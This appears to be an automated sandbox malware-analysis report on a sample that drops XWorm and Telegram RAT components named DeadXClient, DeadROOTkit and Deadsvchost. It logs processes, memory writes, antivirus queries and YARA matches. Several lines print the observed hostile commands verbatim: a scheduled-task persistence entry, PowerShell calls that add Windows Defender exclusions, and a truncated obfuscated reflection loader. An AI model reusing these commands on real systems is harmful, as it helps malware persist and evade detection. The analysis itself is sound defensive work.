                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\Public\DeadROOTkit.exe base: 1BB10000
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadXClient.exe "C:\Users\Public\DeadXClient.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadROOTkit.exe "C:\Users\Public\DeadROOTkit.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeProcess created: C:\Users\Public\DeadCodeRootKit.exe "C:\Users\Public\DeadCodeRootKit.exe" Jump to behavior
                          Source: C:\Users\Public\DeadXClient.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: C:\Users\Public\Deadsvchost.exe "C:\Users\Public\Deadsvchost.exe" Jump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:bubcgltffnzz{param([outputtype([type])][parameter(position=0)][type[]]$qbdraqnalmmwja,[parameter(position=1)][type]$duqqlsyxsk)$pndjvvbnfjt=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+'e'+''+[char](102)+''+[char](108)+''+[char](101)+''+'c'+''+[char](116)+''+[char](101)+''+[char](100)+''+[char](68)+'e'+[char](108)+''+[char](101)+''+'g'+''+[char](97)+''+[char](116)+'e')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+'n'+''+[char](77)+''+'e'+''+[char](109)+''+'o'+''+'r'+'y'+[char](77)+'o'+[char](100)+''+[char](117)+'l'+[char](101)+'',$false).definetype(''+'m'+''+[char](121)+'de'+'l'+'e'+[char](103)+''+[char](97)+''+[char](116)+''+'e'+''+'t'+''+'y'+''+'p'+''+'e'+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'u'+'b'+'l'+[char](105)+''+[char](99)+','+'s'+''+'e'+''+[char](97)+''+[char](108)+''+[char](101)+'d,a'+[char](110)+''+[char](115)+'i'+[char](67)+''+'l'+''+[char](97)+''+[char](115)+''+'s'+''+[char](44)+'au'+[char](116)+''+'o'+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$pndjvvbnfjt.defineconstructor(''+[char](82)+''+[char](84)+'s'+[char](112)+''+'e'+''+[char](99)+''+[char](105)+''+[char](97)+''+[char](108)+''+'n'+''+[char](97)+'m'+[char](101)+''+','+''+'h'+''+[char](105)+''+'d'+''+'e'+''+[char](66)+'y'+[char](83)+'i'+'g'+''+[char](44)+''+'p'+''+[char](117)+''+[char](98)+''+'l'+''+'i'+''+[char](99)+'',[reflection.callingconventions]::standard,$qbdraqnalmmwja).setimplementationflags('r'+[char](117)+''+'n'+'t'+[char](105)+''+'m'+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+''+[char](110)+''+[char](97)+''+[char](103)+''+[char](101)+''+[char](100)+'');$pndjvvbnfjt.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+[char](107)+''+'e'+'',''+'p'+''+[char](117)+'bl'+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+'i'+''+[char](100)+'e'+'b'+''+[char](121)+''+'s'+''+'i'+''+'g'+''+[char](44)+''+[char](78)+''+[char](101)+''+[char](119)+''+[char](83)+''+[char](108)+''+[char](111)+''+'t'+','+[char](86)+''+[char](105)+'r'+[char](116)+'u'+'a'+''+'l'+'',$duqqlsyxsk,$qbdraqnalmmwja).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+'e'+[char](44)+''+'m'+'a'+[char](110)+''+[char](97)+''+'g'+''+[char](101)+''+[char](100)+'');write-output $pndjvvbnfjt.createtype();}$rjkdrlkuxkpoh=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('sy'+'s'+''+[char](116)+''+[char](101)+''+[char](109)+''+[char](46)+''+[char](100)+'l'+[char](108)+'')}).gettype(''+'m'+''+[char](105)+''+[char](99)+'r'+[char](111)+''+'s'+''+[char](111)+''+'f'+'t.w'+[char](105)+'n'+[char](51)+'2.'+[char](85)+''+[char](110)+'s'+[char](97)+'f
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,6_2_00000001400022FC
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,6_2_00000001400022FC
                          Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                          Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000010.00000002.3008522588.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000010.00000000.1784338217.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                          Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                          Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                          Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                          Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                          Source: DeadXClient.exe, 00000001.00000002.2955878706.0000000002956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2b
                          Source: winlogon.exe, 0000000B.00000002.2965080683.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000000B.00000000.1755965306.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000010.00000002.3010521437.000002BAA8050000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_3_000002E86A0715C0 cpuid 6_3_000002E86A0715C0
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeQueries volume information: C:\Users\user\Desktop\mIURiU8n2P.exe VolumeInformationJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeQueries volume information: C:\Users\Public\DeadXClient.exe VolumeInformationJump to behavior
                          Source: C:\Users\Public\DeadXClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeQueries volume information: C:\Users\Public\DeadROOTkit.exe VolumeInformationJump to behavior
                          Source: C:\Users\Public\DeadROOTkit.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
                          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\DeadROOTkit VolumeInformation
                          Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\Public\Deadsvchost.exeQueries volume information: C:\Users\Public\Deadsvchost.exe VolumeInformation
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000001400022FC AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,6_2_00000001400022FC
                          Source: C:\Windows\System32\dllhost.exeCode function: 6_2_000002E86A097D80 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_000002E86A097D80
                          Source: C:\Users\user\Desktop\mIURiU8n2P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: DeadXClient.exe, 00000001.00000002.2920271280.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, DeadXClient.exe, 00000001.00000002.3027772809.000000001B9AD000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B24A000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C232000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2927052039.0000000000653000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.3021083220.000000001C238000.00000004.00000020.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2999435722.000000001B1C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: dllhost.exe, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.25.drBinary or memory string: MsMpEng.exe
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\Public\DeadROOTkit.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                          Source: C:\Users\Public\DeadROOTkit.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                          Yara detected XWorm
                          Source: Yara matchFile source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\Public\DeadXClient.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                          Remote Access Functionality

                          barindex
                          Yara detected Telegram RAT
                          Source: Yara matchFile source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                          Yara detected XWorm
                          Source: Yara matchFile source: 2.0.DeadROOTkit.exe.1a0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.mIURiU8n2P.exe.27c5330.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.DeadXClient.exe.680000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
